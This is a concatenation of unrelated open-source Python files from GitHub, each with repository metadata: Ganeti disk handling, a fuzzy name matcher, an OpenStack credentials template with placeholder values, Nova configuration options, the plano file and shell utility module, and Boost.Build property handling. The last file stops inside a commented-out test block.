self._undoing_info = CreateDisks(self._lu, self._instance, disks=new_disks)
for idx, new_disk in enumerate(new_disks):
self._lu.cfg.AddInstanceDisk(self._instance.uuid, new_disk, idx=idx)
self._instance = self._lu.cfg.GetInstanceInfo(self._instance.uuid)
self._feedback_fn("Temporary disk created")
self._new_disks = new_disks
return new_disks
def __exit__(self, exc_type, _value, _traceback):
""" Context manager exit function, destroying the disk.
"""
if exc_type:
self._feedback_fn("Exception raised, cleaning up temporary disk")
else:
self._feedback_fn("Regular cleanup of temporary disk")
try:
self._EnsureInstanceDiskState()
_UndoCreateDisks(self._lu, self._undoing_info, self._instance)
for disk in self._new_disks:
self._lu.cfg.RemoveInstanceDisk(self._instance.uuid, disk.uuid)
self._instance = self._lu.cfg.GetInstanceInfo(self._instance.uuid)
self._feedback_fn("Temporary disk removed")
except:
self._feedback_fn("Disk cleanup failed; it will have to be removed "
"manually")
raise
|
{
"content_hash": "85072568709285863dae4a52c5137199",
"timestamp": "",
"source": "github",
"line_count": 3112,
"max_line_length": 80,
"avg_line_length": 38.926735218508995,
"alnum_prop": 0.6302459963678388,
"repo_name": "onponomarev/ganeti",
"id": "3abc5f8ee0e54e8cb9b38e54fc24d0f404f70e9d",
"size": "122530",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/cmdlib/instance_storage.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Haskell",
"bytes": "2639381"
},
{
"name": "Python",
"bytes": "5967379"
},
{
"name": "Shell",
"bytes": "118007"
}
],
"symlink_target": ""
}
|
from fuzzywuzzy import process
import codecs#, re, sys
from residents import RESIDENTS, NAMES
filename = raw_input('Enter a name for the new file: ')
file = codecs.open(filename, 'w', encoding='utf-8', errors='ignore')
for resident in RESIDENTS:
match = process.extractOne(resident, NAMES)
name, accuracy = match[0], match[1]
# if accuracy < 60:
# print resident
# name = raw_input("Enter Resident Name: ")
s = "'%s': '%s', %s\n" % (resident, name, accuracy)
file.write(unicode(s))
file.close()
|
{
"content_hash": "878d8a7a54d448b2bfd65ad1459d5b0f",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 68,
"avg_line_length": 34,
"alnum_prop": 0.6843137254901961,
"repo_name": "swiharta/radres",
"id": "9a18fa0b2044ba6be3c2f30eeb4b35f1e86a258d",
"size": "510",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "match.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ActionScript",
"bytes": "69146"
},
{
"name": "C#",
"bytes": "3961"
},
{
"name": "CSS",
"bytes": "810888"
},
{
"name": "CoffeeScript",
"bytes": "36376"
},
{
"name": "ColdFusion",
"bytes": "3203"
},
{
"name": "Java",
"bytes": "42001"
},
{
"name": "JavaScript",
"bytes": "1372325"
},
{
"name": "PHP",
"bytes": "19400"
},
{
"name": "Perl",
"bytes": "468"
},
{
"name": "Python",
"bytes": "195378"
},
{
"name": "Ruby",
"bytes": "672"
},
{
"name": "Shell",
"bytes": "110"
},
{
"name": "Visual Basic",
"bytes": "2769"
}
],
"symlink_target": ""
}
|
import os
# With the addition of Keystone, to use an openstack cloud you should
# authenticate against keystone, which returns a **Token** and **Service
# Catalog**. The catalog contains the endpoint for all services the
# user/tenant has access to - including nova, glance, keystone, swift.
#
# *NOTE*: Using the 2.0 *auth api* does not mean that compute api is 2.0. We
# will use the 1.1 *compute api*
os.environ['OS_AUTH_URL'] = "https://keystone.rc.nectar.org.au:5000/v2.0/"
# With the addition of Keystone we have standardized on the term **tenant**
# as the entity that owns the resources.
os.environ['OS_TENANT_ID'] = "123456789012345678901234567890"
os.environ['OS_TENANT_NAME'] = "tenant_name"
# In addition to the owning entity (tenant), openstack stores the entity
# performing the action as the **user**.
os.environ['OS_USERNAME'] = "joe.bloggs@uni.edu.au"
# With Keystone you pass the keystone password.
os.environ['OS_PASSWORD'] = "????????????????????"
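# Example (illustrative): any client code run after these assignments can
# pick the credentials up from the environment, e.g.
#
#   auth_url = os.environ['OS_AUTH_URL']
#   username = os.environ['OS_USERNAME']
#   password = os.environ['OS_PASSWORD']
#   # ... pass these to the OpenStack client library of your choice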
|
{
"content_hash": "10ddac7e8c5e27e4b904498a42330c6a",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 77,
"avg_line_length": 42.391304347826086,
"alnum_prop": 0.7138461538461538,
"repo_name": "wettenhj/mytardis-swift-uploader",
"id": "8918554632890de54b14794e5fac542aaf4ce0e6",
"size": "994",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "openrc.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "30706"
}
],
"symlink_target": ""
}
|
import os
import socket
from nova.openstack.common import cfg
from nova.openstack.common import rpc
def _get_my_ip():
"""
Returns the actual ip of the local machine.
This code figures out what source address would be used if some traffic
were to be sent out to some well known address on the Internet. In this
case, a Google DNS server is used, but the specific address does not
matter much. No traffic is actually sent.
"""
try:
csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
csock.connect(('8.8.8.8', 80))
(addr, port) = csock.getsockname()
csock.close()
return addr
except socket.error:
return "127.0.0.1"
global_opts = [
cfg.StrOpt('my_ip',
default=_get_my_ip(),
help='ip address of this host'),
cfg.ListOpt('enabled_apis',
default=['ec2', 'osapi_compute', 'metadata'],
help='a list of APIs to enable by default'),
cfg.StrOpt('vpn_image_id',
default='0',
help='image id used when starting up a cloudpipe vpn server'),
cfg.StrOpt('vpn_key_suffix',
default='-vpn',
help='Suffix to add to project name for vpn key and secgroups'),
cfg.StrOpt('host',
default=socket.getfqdn(),
help='Name of this node. This can be an opaque identifier. '
'It is not necessarily a hostname, FQDN, or IP address. '
'However, the node name must be valid within '
'an AMQP key, and if using ZeroMQ, a valid '
'hostname, FQDN, or IP address'),
cfg.ListOpt('memcached_servers',
default=None,
help='Memcached servers or None for in process cache.'),
cfg.BoolOpt('use_ipv6',
default=False,
help='use ipv6'),
cfg.IntOpt('service_down_time',
default=60,
help='maximum time since last check-in for up service'),
]
cfg.CONF.register_opts(global_opts)
def parse_args(argv, default_config_files=None):
rpc.set_defaults(control_exchange='nova')
cfg.CONF(argv[1:],
project='nova',
default_config_files=default_config_files)
|
{
"content_hash": "dc54600112da82b53ef6e1715b327090",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 79,
"avg_line_length": 35.215384615384615,
"alnum_prop": 0.581476627348187,
"repo_name": "fajoy/nova",
"id": "172e772ae5a6a47d9708e588ef835ff1d2d0829b",
"size": "3097",
"binary": false,
"copies": "1",
"ref": "refs/heads/grizzly-2",
"path": "nova/config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "16002"
},
{
"name": "JavaScript",
"bytes": "7403"
},
{
"name": "Python",
"bytes": "7567423"
},
{
"name": "Shell",
"bytes": "15428"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
import atexit as _atexit
import codecs as _codecs
import fnmatch as _fnmatch
import getpass as _getpass
import os as _os
import random as _random
import re as _re
import shutil as _shutil
import subprocess as _subprocess
import sys as _sys
import tarfile as _tarfile
import tempfile as _tempfile
import traceback as _traceback
# See documentation at http://www.ssorj.net/projects/plano.html
def fail(message, *args):
error(message, *args)
if isinstance(message, BaseException):
raise message
raise Exception(message)
def error(message, *args):
_print_message("Error", message, args, _sys.stderr)
def warn(message, *args):
_print_message("Warn", message, args, _sys.stderr)
def notice(message, *args):
_print_message(None, message, args, _sys.stdout)
def debug(message, *args):
_print_message("Debug", message, args, _sys.stdout)
def exit(message=None, *args):
if message is None:
_sys.exit()
_print_message("Error", message, args, _sys.stderr)
_sys.exit(1)
def _print_message(category, message, args, file):
message = _format_message(category, message, args)
print(message, file=file)
file.flush()
def _format_message(category, message, args):
if isinstance(message, BaseException):
message = str(message)
if message == "":
message = message.__class__.__name__
if category:
message = "{0}: {1}".format(category, message)
if args:
message = message.format(*args)
script = split(_sys.argv[0])[1]
message = "{0}: {1}".format(script, message)
return message
def flush():
_sys.stdout.flush()
_sys.stderr.flush()
absolute_path = _os.path.abspath
normalize_path = _os.path.normpath
exists = _os.path.exists
is_absolute = _os.path.isabs
is_dir = _os.path.isdir
is_file = _os.path.isfile
is_link = _os.path.islink
join = _os.path.join
split = _os.path.split
split_extension = _os.path.splitext
LINE_SEP = _os.linesep
PATH_SEP = _os.sep
PATH_VAR_SEP = _os.pathsep
ENV = _os.environ
ARGS = _sys.argv
current_dir = _os.getcwd
def home_dir(user=""):
return _os.path.expanduser("~{0}".format(user))
def parent_dir(path):
path = normalize_path(path)
parent, child = split(path)
return parent
def file_name(file):
file = normalize_path(file)
dir, name = split(file)
return name
def name_stem(file):
name = file_name(file)
if name.endswith(".tar.gz"):
name = name[:-3]
stem, ext = split_extension(name)
return stem
def name_extension(file):
name = file_name(file)
stem, ext = split_extension(name)
return ext
def read(file):
with _codecs.open(file, encoding="utf-8", mode="r") as f:
return f.read()
def write(file, string):
with _codecs.open(file, encoding="utf-8", mode="w") as f:
f.write(string)
return file
def append(file, string):
with _codecs.open(file, encoding="utf-8", mode="a") as f:
f.write(string)
return file
def prepend(file, string):
orig = read(file)
prepended = string + orig
return write(file, prepended)
def touch(file):
return append(file, "")
def tail(file, n):
return "".join(tail_lines(file, n))
def read_lines(file):
with _codecs.open(file, encoding="utf-8", mode="r") as f:
return f.readlines()
def write_lines(file, lines):
with _codecs.open(file, encoding="utf-8", mode="r") as f:
f.writelines(lines)
return file
def append_lines(file, lines):
with _codecs.open(file, encoding="utf-8", mode="a") as f:
f.writelines(lines)
return file
def prepend_lines(file, lines):
orig_lines = read_lines(file)
with _codecs.open(file, encoding="utf-8", mode="w") as f:
f.writelines(lines)
f.writelines(orig_lines)
return file
# Derived from http://stackoverflow.com/questions/136168/get-last-n-lines-of-a-file-with-python-similar-to-tail
def tail_lines(file, n):
assert n >= 0
with _codecs.open(file, encoding="utf-8", mode="r") as f:
pos = n + 1
lines = list()
while len(lines) <= n:
try:
f.seek(-pos, 2)
except IOError:
f.seek(0)
break
finally:
lines = f.readlines()
pos *= 2
return lines[-n:]
_temp_dir = _tempfile.mkdtemp(prefix="plano.")
def _get_temp_file(key):
assert not key.startswith("_")
return join(_temp_dir, "_file_{0}".format(key))
def _remove_temp_dir():
_shutil.rmtree(_temp_dir, ignore_errors=True)
_atexit.register(_remove_temp_dir)
def read_temp(key):
file = _get_temp_file(key)
return read(file)
def write_temp(key, string):
file = _get_temp_file(key)
return write(file, string)
def append_temp(key, string):
file = _get_temp_file(key)
return append(file, string)
def prepend_temp(key, string):
file = _get_temp_file(key)
return prepend(file, string)
def make_temp(key):
return append_temp(key, "")
def open_temp(key, mode="r"):
file = _get_temp_file(key)
return _codecs.open(file, encoding="utf-8", mode=mode)
# This one is deleted on process exit
def make_temp_dir():
return _tempfile.mkdtemp(prefix="_dir_", dir=_temp_dir)
# This one sticks around
def make_user_temp_dir():
temp_dir = _tempfile.gettempdir()
user = _getpass.getuser()
user_temp_dir = join(temp_dir, user)
return make_dir(user_temp_dir)
def copy(from_path, to_path):
notice("Copying '{0}' to '{1}'", from_path, to_path)
to_dir = parent_dir(to_path)
if to_dir:
make_dir(to_dir)
if is_dir(from_path):
_copytree(from_path, to_path, symlinks=True)
else:
_shutil.copy(from_path, to_path)
return to_path
def move(from_path, to_path):
notice("Moving '{0}' to '{1}'", from_path, to_path)
_shutil.move(from_path, to_path)
return to_path
def rename(path, expr, replacement):
path = normalize_path(path)
parent_dir, name = split(path)
to_name = string_replace(name, expr, replacement)
to_path = join(parent_dir, to_name)
notice("Renaming '{0}' to '{1}'", path, to_path)
move(path, to_path)
return to_path
def remove(path):
notice("Removing '{0}'", path)
if not exists(path):
return
if is_dir(path):
_shutil.rmtree(path, ignore_errors=True)
else:
_os.remove(path)
return path
def make_link(source_path, link_file):
if exists(link_file):
assert read_link(link_file) == source_path
return
_os.symlink(source_path, link_file)
return link_file
def read_link(file):
return _os.readlink(file)
def find(dir, *patterns):
matched_paths = set()
if not patterns:
patterns = ("*",)
for root, dirs, files in _os.walk(dir):
for pattern in patterns:
matched_dirs = _fnmatch.filter(dirs, pattern)
matched_files = _fnmatch.filter(files, pattern)
matched_paths.update([join(root, x) for x in matched_dirs])
matched_paths.update([join(root, x) for x in matched_files])
return sorted(matched_paths)
def find_any_one(dir, *patterns):
paths = find(dir, *patterns)
if len(paths) == 0:
return
return paths[0]
def find_only_one(dir, *patterns):
paths = find(dir, *patterns)
if len(paths) == 0:
return
assert len(paths) == 1
return paths[0]
# find_via_expr?
def string_replace(string, expr, replacement, count=0):
return _re.sub(expr, replacement, string, count)
def make_dir(dir):
if not exists(dir):
_os.makedirs(dir)
return dir
# Returns the current working directory so you can change it back
def change_dir(dir):
notice("Changing directory to '{0}'", dir)
cwd = current_dir()
_os.chdir(dir)
return cwd
def list_dir(dir, *patterns):
assert is_dir(dir)
names = _os.listdir(dir)
if not patterns:
return sorted(names)
matched_names = set()
for pattern in patterns:
matched_names.update(_fnmatch.filter(names, pattern))
return sorted(matched_names)
class working_dir(object):
def __init__(self, dir):
self.dir = dir
self.prev_dir = None
def __enter__(self):
self.prev_dir = change_dir(self.dir)
return self.dir
def __exit__(self, type, value, traceback):
change_dir(self.prev_dir)
def _init_call(command, args, kwargs):
if args:
command = command.format(*args)
if "shell" not in kwargs:
kwargs["shell"] = True
notice("Calling '{0}'", command)
return command, kwargs
def call(command, *args, **kwargs):
command, kwargs = _init_call(command, args, kwargs)
_subprocess.check_call(command, **kwargs)
def call_for_output(command, *args, **kwargs):
command, kwargs = _init_call(command, args, kwargs)
return _subprocess_check_output(command, **kwargs)
def make_archive(input_dir, output_dir, archive_stem):
temp_dir = make_temp_dir()
temp_input_dir = join(temp_dir, archive_stem)
copy(input_dir, temp_input_dir)
make_dir(output_dir)
output_file = "{0}.tar.gz".format(join(output_dir, archive_stem))
output_file = absolute_path(output_file)
with working_dir(temp_dir):
call("tar -czf {0} {1}", output_file, archive_stem)
return output_file
def extract_archive(archive_file, output_dir):
assert is_file(archive_file)
if not exists(output_dir):
make_dir(output_dir)
archive_file = absolute_path(archive_file)
with working_dir(output_dir):
call("tar -xf {0}", archive_file)
return output_dir
def rename_archive(archive_file, new_archive_stem):
assert is_file(archive_file)
if name_stem(archive_file) == new_archive_stem:
return
temp_dir = make_temp_dir()
extract_archive(archive_file, temp_dir)
input_name = list_dir(temp_dir)[0]
input_dir = join(temp_dir, input_name)
output_file = make_archive(input_dir, temp_dir, new_archive_stem)
output_name = file_name(output_file)
archive_dir = parent_dir(archive_file)
new_archive_file = join(archive_dir, output_name)
move(output_file, new_archive_file)
remove(archive_file)
return new_archive_file
def random_port(min=49152, max=65535):
return _random.randint(min, max)
# Modified copytree impl that allows for already existing destination
# dirs
def _copytree(src, dst, symlinks=False, ignore=None):
"""Recursively copy a directory tree using copy2().
If exception(s) occur, an Error is raised with a list of reasons.
If the optional symlinks flag is true, symbolic links in the
source tree result in symbolic links in the destination tree; if
it is false, the contents of the files pointed to by symbolic
links are copied.
The optional ignore argument is a callable. If given, it
is called with the `src` parameter, which is the directory
being visited by copytree(), and `names` which is the list of
`src` contents, as returned by os.listdir():
callable(src, names) -> ignored_names
Since copytree() is called recursively, the callable will be
called once for each directory that is copied. It returns a
list of names relative to the `src` directory that should
not be copied.
XXX Consider this example code rather than the ultimate tool.
"""
names = _os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
if not exists(dst):
_os.makedirs(dst)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = _os.path.join(src, name)
dstname = _os.path.join(dst, name)
try:
if symlinks and _os.path.islink(srcname):
linkto = _os.readlink(srcname)
_os.symlink(linkto, dstname)
elif _os.path.isdir(srcname):
_copytree(srcname, dstname, symlinks, ignore)
else:
# Will raise a SpecialFileError for unsupported file types
_shutil.copy2(srcname, dstname)
# catch the Error from the recursive copytree so that we can
# continue with other files
except _shutil.Error as err:
errors.extend(err.args[0])
except EnvironmentError as why:
errors.append((srcname, dstname, str(why)))
try:
_shutil.copystat(src, dst)
except OSError as why:
if _shutil.WindowsError is not None and isinstance \
(why, _shutil.WindowsError):
# Copying file access times may fail on Windows
pass
else:
errors.append((src, dst, str(why)))
if errors:
raise _shutil.Error(errors)
# For Python 2.6 compatibility
def _subprocess_check_output(command, **kwargs):
kwargs["stdout"] = _subprocess.PIPE
proc = _subprocess.Popen(command, **kwargs)
output = proc.communicate()[0]
exit_code = proc.poll()
if exit_code not in (None, 0):
error = _subprocess.CalledProcessError(exit_code, command)
error.output = output
raise error
return output
|
{
"content_hash": "aa02a6833343d338f0c54195b297f251",
"timestamp": "",
"source": "github",
"line_count": 540,
"max_line_length": 111,
"avg_line_length": 24.612962962962964,
"alnum_prop": 0.6308027988864645,
"repo_name": "irinabov/debian-qpid-cpp-1.35.0",
"id": "e76fba03eb432025c6bb15680ffd33b66a1e91d3",
"size": "14083",
"binary": false,
"copies": "3",
"ref": "refs/heads/trusty",
"path": "src/tests/plano.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
'collections module study'
__author__ = 'XieYu'
from collections import namedtuple
Point = namedtuple('Point', ['x', 'y'])
p = Point(1, 2)
print(p.x, p.y)
from collections import deque
q = deque(['a', 'b', 'c'])
q.append('x')
q.appendleft('y')
print(q)
|
{
"content_hash": "145ef0e22973cc9ecb9435191266f5af",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 39,
"avg_line_length": 17,
"alnum_prop": 0.6392156862745098,
"repo_name": "xieyufish/note",
"id": "d8ff3456ecc284e008c7a700ecf65377778498d2",
"size": "303",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "语言/python/code/study/collections.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "696858"
},
{
"name": "HTML",
"bytes": "14260"
},
{
"name": "Java",
"bytes": "83898"
},
{
"name": "JavaScript",
"bytes": "621101"
},
{
"name": "Python",
"bytes": "70835"
}
],
"symlink_target": ""
}
|
import re
import sys
from b2.util.utility import *
from b2.build import feature
from b2.util import sequence, qualify_jam_action, is_iterable_typed
import b2.util.set
from b2.manager import get_manager
__re_two_ampersands = re.compile ('&&')
__re_comma = re.compile (',')
__re_split_condition = re.compile ('(.*):(<.*)')
__re_split_conditional = re.compile (r'(.+):<(.+)')
__re_colon = re.compile (':')
__re_has_condition = re.compile (r':<')
__re_separate_condition_and_property = re.compile (r'(.*):(<.*)')
__not_applicable_feature='not-applicable-in-this-context'
feature.feature(__not_applicable_feature, [], ['free'])
__abbreviated_paths = False
class Property(object):
__slots__ = ('_feature', '_value', '_condition')
def __init__(self, f, value, condition = []):
if type(f) == type(""):
f = feature.get(f)
# At present, a single property has a single value.
assert type(value) != type([])
assert(f.free() or value.find(':') == -1)
self._feature = f
self._value = value
self._condition = condition
def feature(self):
return self._feature
def value(self):
return self._value
def condition(self):
return self._condition
def to_raw(self):
result = "<" + self._feature.name() + ">" + str(self._value)
if self._condition:
result = ",".join(str(p) for p in self._condition) + ':' + result
return result
def __str__(self):
return self.to_raw()
def __hash__(self):
# FIXME: consider if this class should be a value-is-identity one
return hash((self._feature, self._value, tuple(self._condition)))
def __cmp__(self, other):
return cmp((self._feature.name(), self._value, self._condition),
(other._feature.name(), other._value, other._condition))
def create_from_string(s, allow_condition=False,allow_missing_value=False):
assert isinstance(s, basestring)
assert isinstance(allow_condition, bool)
assert isinstance(allow_missing_value, bool)
condition = []
import types
if not isinstance(s, types.StringType):
print type(s)
if __re_has_condition.search(s):
if not allow_condition:
raise BaseException("Conditional property is not allowed in this context")
m = __re_separate_condition_and_property.match(s)
condition = m.group(1)
s = m.group(2)
# FIXME: break dependency cycle
from b2.manager import get_manager
feature_name = get_grist(s)
if not feature_name:
if feature.is_implicit_value(s):
f = feature.implied_feature(s)
value = s
else:
raise get_manager().errors()("Invalid property '%s' -- unknown feature" % s)
else:
if feature.valid(feature_name):
f = feature.get(feature_name)
value = get_value(s)
else:
# In case feature name is not known, it is wrong to do a hard error.
# Feature sets change depending on the toolset. So e.g.
# <toolset-X:version> is an unknown feature when using toolset Y.
#
# Ideally we would like to ignore this value, but most of
# Boost.Build code expects that we return a valid Property. For this
# reason we use a sentinel <not-applicable-in-this-context> feature.
#
# The underlying cause for this problem is that python port Property
# is more strict than its Jam counterpart and must always reference
# a valid feature.
f = feature.get(__not_applicable_feature)
value = s
if not value and not allow_missing_value:
get_manager().errors()("Invalid property '%s' -- no value specified" % s)
if condition:
condition = [create_from_string(x) for x in condition.split(',')]
return Property(f, value, condition)
def create_from_strings(string_list, allow_condition=False):
assert is_iterable_typed(string_list, basestring)
return [create_from_string(s, allow_condition) for s in string_list]
def reset ():
""" Clear the module state. This is mainly for testing purposes.
"""
global __results
# A cache of results from as_path
__results = {}
reset ()
def set_abbreviated_paths(on=True):
global __abbreviated_paths
__abbreviated_paths = on
def get_abbreviated_paths():
return __abbreviated_paths or '--abbreviated-paths' in sys.argv
def path_order (x, y):
""" Helper for as_path, below. Orders properties with the implicit ones
first, and within the two sections in alphabetical order of feature
name.
"""
if x == y:
return 0
xg = get_grist (x)
yg = get_grist (y)
if yg and not xg:
return -1
elif xg and not yg:
return 1
else:
if not xg:
x = feature.expand_subfeatures([x])
y = feature.expand_subfeatures([y])
if x < y:
return -1
elif x > y:
return 1
else:
return 0
def identify(string):
return string
# Uses Property
def refine (properties, requirements):
""" Refines 'properties' by overriding any non-free properties
for which a different value is specified in 'requirements'.
Conditional requirements are just added without modification.
Returns the resulting list of properties.
"""
assert is_iterable_typed(properties, Property)
assert is_iterable_typed(requirements, Property)
# The result has no duplicates, so we store it in a set
result = set()
# Records all requirements.
required = {}
# All the elements of requirements should be present in the result
# Record them so that we can handle 'properties'.
for r in requirements:
# Don't consider conditional requirements.
if not r.condition():
required[r.feature()] = r
for p in properties:
# Skip conditional properties
if p.condition():
result.add(p)
# No processing for free properties
elif p.feature().free():
result.add(p)
else:
if required.has_key(p.feature()):
result.add(required[p.feature()])
else:
result.add(p)
return sequence.unique(list(result) + requirements)
def translate_paths (properties, path):
""" Interpret all path properties in 'properties' as relative to 'path'
The property values are assumed to be in system-specific form, and
will be translated into normalized form.
"""
result = []
for p in properties:
if p.feature().path():
values = __re_two_ampersands.split(p.value())
new_value = "&&".join(os.path.join(path, v) for v in values)
if new_value != p.value():
result.append(Property(p.feature(), new_value, p.condition()))
else:
result.append(p)
else:
result.append (p)
return result
def translate_indirect(properties, context_module):
"""Assumes that all feature values that start with '@' are
names of rules, used in 'context-module'. Such rules can be
either local to the module or global. Local rules are qualified
with the name of the module."""
assert is_iterable_typed(properties, Property)
assert isinstance(context_module, basestring)
result = []
for p in properties:
if p.value()[0] == '@':
q = qualify_jam_action(p.value()[1:], context_module)
get_manager().engine().register_bjam_action(q)
result.append(Property(p.feature(), '@' + q, p.condition()))
else:
result.append(p)
return result
def validate (properties):
""" Exit with error if any of the properties is not valid.
properties may be a single property or a sequence of properties.
"""
if isinstance(properties, Property):
properties = [properties]
assert is_iterable_typed(properties, Property)
for p in properties:
__validate1(p)
def expand_subfeatures_in_conditions (properties):
assert is_iterable_typed(properties, Property)
result = []
for p in properties:
if not p.condition():
result.append(p)
else:
expanded = []
for c in p.condition():
if c.feature().name().startswith("toolset") or c.feature().name() == "os":
# It is common that the condition includes a toolset which
# was never defined, or mentions subfeatures which
# were never defined. In that case, validation would
# only produce a spurious error, so don't validate.
expanded.extend(feature.expand_subfeatures ([c], True))
else:
expanded.extend(feature.expand_subfeatures([c]))
result.append(Property(p.feature(), p.value(), expanded))
return result
# FIXME: this should go
def split_conditional (property):
""" If 'property' is conditional property, returns
condition and the property, e.g
<variant>debug,<toolset>gcc:<inlining>full will become
<variant>debug,<toolset>gcc <inlining>full.
Otherwise, returns empty string.
"""
assert isinstance(property, basestring)
m = __re_split_conditional.match (property)
if m:
return (m.group (1), '<' + m.group (2))
return None
def select (features, properties):
""" Selects properties which correspond to any of the given features.
"""
assert is_iterable_typed(properties, basestring)
result = []
# add any missing angle brackets
features = add_grist (features)
return [p for p in properties if get_grist(p) in features]
def validate_property_sets (sets):
if __debug__:
from .property_set import PropertySet
assert is_iterable_typed(sets, PropertySet)
for s in sets:
validate(s.all())
def evaluate_conditionals_in_context (properties, context):
""" Removes all conditional properties which conditions are not met
For those with met conditions, removes the condition. Properies
in conditions are looked up in 'context'
"""
if __debug__:
from .property_set import PropertySet
assert is_iterable_typed(properties, Property)
assert isinstance(context, PropertySet)
base = []
conditional = []
for p in properties:
if p.condition():
conditional.append (p)
else:
base.append (p)
result = base[:]
for p in conditional:
# Evaluate condition
# FIXME: probably inefficient
if all(x in context for x in p.condition()):
result.append(Property(p.feature(), p.value()))
return result
def change (properties, feature, value = None):
""" Returns a modified version of properties with all values of the
given feature replaced by the given value.
If 'value' is None the feature will be removed.
"""
assert is_iterable_typed(properties, basestring)
assert isinstance(feature, basestring)
assert isinstance(value, (basestring, type(None)))
result = []
feature = add_grist (feature)
for p in properties:
if get_grist (p) == feature:
if value:
result.append (replace_grist (value, feature))
else:
result.append (p)
return result
################################################################
# Private functions
def __validate1 (property):
""" Exit with error if property is not valid.
"""
assert isinstance(property, Property)
msg = None
if not property.feature().free():
feature.validate_value_string (property.feature(), property.value())
###################################################################
# Still to port.
# Original lines are prefixed with "# "
#
#
# import utility : ungrist ;
# import sequence : unique ;
# import errors : error ;
# import feature ;
# import regex ;
# import sequence ;
# import set ;
# import path ;
# import assert ;
#
#
# rule validate-property-sets ( property-sets * )
# {
# for local s in $(property-sets)
# {
# validate [ feature.split $(s) ] ;
# }
# }
#
def remove(attributes, properties):
"""Returns a property sets which include all the elements
in 'properties' that do not have attributes listed in 'attributes'."""
if isinstance(attributes, basestring):
attributes = [attributes]
assert is_iterable_typed(attributes, basestring)
assert is_iterable_typed(properties, basestring)
result = []
for e in properties:
attributes_new = feature.attributes(get_grist(e))
has_common_features = 0
for a in attributes_new:
if a in attributes:
has_common_features = 1
break
if not has_common_features:
result.append(e)
return result
def take(attributes, properties):
"""Returns a property set which include all
properties in 'properties' that have any of 'attributes'."""
assert is_iterable_typed(attributes, basestring)
assert is_iterable_typed(properties, basestring)
result = []
for e in properties:
if b2.util.set.intersection(attributes, feature.attributes(get_grist(e))):
result.append(e)
return result
def translate_dependencies(properties, project_id, location):
assert is_iterable_typed(properties, Property)
assert isinstance(project_id, basestring)
assert isinstance(location, basestring)
result = []
for p in properties:
if not p.feature().dependency():
result.append(p)
else:
v = p.value()
m = re.match("(.*)//(.*)", v)
if m:
rooted = m.group(1)
if rooted[0] == '/':
# Either project id or absolute Linux path, do nothing.
pass
else:
rooted = os.path.join(os.getcwd(), location, rooted)
result.append(Property(p.feature(), rooted + "//" + m.group(2), p.condition()))
elif os.path.isabs(v):
result.append(p)
else:
result.append(Property(p.feature(), project_id + "//" + v, p.condition()))
return result
class PropertyMap:
""" Class which maintains a property set -> string mapping.
"""
def __init__ (self):
self.__properties = []
self.__values = []
def insert (self, properties, value):
""" Associate value with properties.
"""
assert is_iterable_typed(properties, basestring)
assert isinstance(value, basestring)
self.__properties.append(properties)
self.__values.append(value)
def find (self, properties):
""" Return the value associated with properties
or any subset of it. If more than one
subset has a value assigned to it, return the
value for the longest subset, if it's unique.
"""
assert is_iterable_typed(properties, basestring)
return self.find_replace (properties)
def find_replace(self, properties, value=None):
assert is_iterable_typed(properties, basestring)
assert isinstance(value, (basestring, type(None)))
matches = []
match_ranks = []
for i in range(0, len(self.__properties)):
p = self.__properties[i]
if b2.util.set.contains (p, properties):
matches.append (i)
match_ranks.append(len(p))
best = sequence.select_highest_ranked (matches, match_ranks)
if not best:
return None
if len (best) > 1:
raise NoBestMatchingAlternative ()
best = best [0]
original = self.__values[best]
if value:
self.__values[best] = value
return original
# local rule __test__ ( )
# {
# import errors : try catch ;
# import feature ;
# import feature : feature subfeature compose ;
#
# # local rules must be explicitly re-imported
# import property : path-order ;
#
# feature.prepare-test property-test-temp ;
#
# feature toolset : gcc : implicit symmetric ;
# subfeature toolset gcc : version : 2.95.2 2.95.3 2.95.4
# 3.0 3.0.1 3.0.2 : optional ;
# feature define : : free ;
# feature runtime-link : dynamic static : symmetric link-incompatible ;
# feature optimization : on off ;
# feature variant : debug release : implicit composite symmetric ;
# feature rtti : on off : link-incompatible ;
#
# compose <variant>debug : <define>_DEBUG <optimization>off ;
# compose <variant>release : <define>NDEBUG <optimization>on ;
#
# import assert ;
# import "class" : new ;
#
# validate <toolset>gcc <toolset>gcc-3.0.1 : $(test-space) ;
#
# assert.result <toolset>gcc <rtti>off <define>FOO
# : refine <toolset>gcc <rtti>off
# : <define>FOO
# : $(test-space)
# ;
#
# assert.result <toolset>gcc <optimization>on
# : refine <toolset>gcc <optimization>off
# : <optimization>on
# : $(test-space)
# ;
#
# assert.result <toolset>gcc <rtti>off
# : refine <toolset>gcc : <rtti>off : $(test-space)
# ;
#
# assert.result <toolset>gcc <rtti>off <rtti>off:<define>FOO
# : refine <toolset>gcc : <rtti>off <rtti>off:<define>FOO
# : $(test-space)
# ;
#
# assert.result <toolset>gcc:<define>foo <toolset>gcc:<define>bar
# : refine <toolset>gcc:<define>foo : <toolset>gcc:<define>bar
# : $(test-space)
# ;
#
# assert.result <define>MY_RELEASE
# : evaluate-conditionals-in-context
# <variant>release,<rtti>off:<define>MY_RELEASE
# : <toolset>gcc <variant>release <rtti>off
#
# ;
#
# try ;
# validate <feature>value : $(test-space) ;
# catch "Invalid property '<feature>value': unknown feature 'feature'." ;
#
# try ;
# validate <rtti>default : $(test-space) ;
# catch \"default\" is not a known value of feature <rtti> ;
#
# validate <define>WHATEVER : $(test-space) ;
#
# try ;
